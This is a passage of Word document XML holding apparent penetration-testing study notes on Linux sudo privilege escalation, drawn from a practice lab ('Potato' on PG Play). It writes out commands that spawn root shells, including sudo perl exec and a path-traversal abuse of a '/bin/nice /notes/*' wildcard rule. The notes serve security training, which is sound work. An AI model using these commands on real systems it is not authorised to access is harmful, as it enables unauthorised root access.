      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002260">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002261">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a binary that allows you to run a file as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then put the contents "/bin/bash" in a file (the file can have any name and file extension), and then run the file sudo, and you will get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002263">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002265">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 allows all permissions for all users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002266">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run the binary using sudo and this file as the target, like </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002267">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="821"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/nice /notes/../../../../home/kali/shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002268">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002269">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="359" name="image353.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image353.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId735"/>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226A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you have two directories (/bin/nice and /notes/*), that means you can run the first binary (/bin/nice) ON the second directory (/notes/*) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also, the * here means wildcard, so any directory. But as we see later, that means we can also put a bunch of ../../ in order to get this /bin/nice to run on any file we want for priv esc!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> here is a guide of what to do with your results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId736">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000226F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Really good cheat sheet for Linux Privilege Escalation Basics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if you see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/perl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002271">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/perl -e 'exec "/bin/sh"'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002272">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So basically just do "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo [copy and paste command]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002275">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and see this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL : ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002276">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you run this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002277">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002278">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1459"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means you get full interactive root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002279">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="777"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit or CTRL + D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="777"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get out of the root and back into previous user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000227F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have wildcard (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002280">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="495" name="image353.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image353.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId735"/>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2281">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId737">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Potato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002282">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, /bin/nice allows us to run a file as sudo, but here we can only run on /notes/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002283">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, the wildcard is easily exploitable! We can specify /notes/../../../home/kali/shell.sh, where shell.sh can be a file with the contents "/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002284">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 allows all permissions for all users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can run /bin/nice using sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002289">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/nice /notes/../../../../home/kali/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you should have a root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
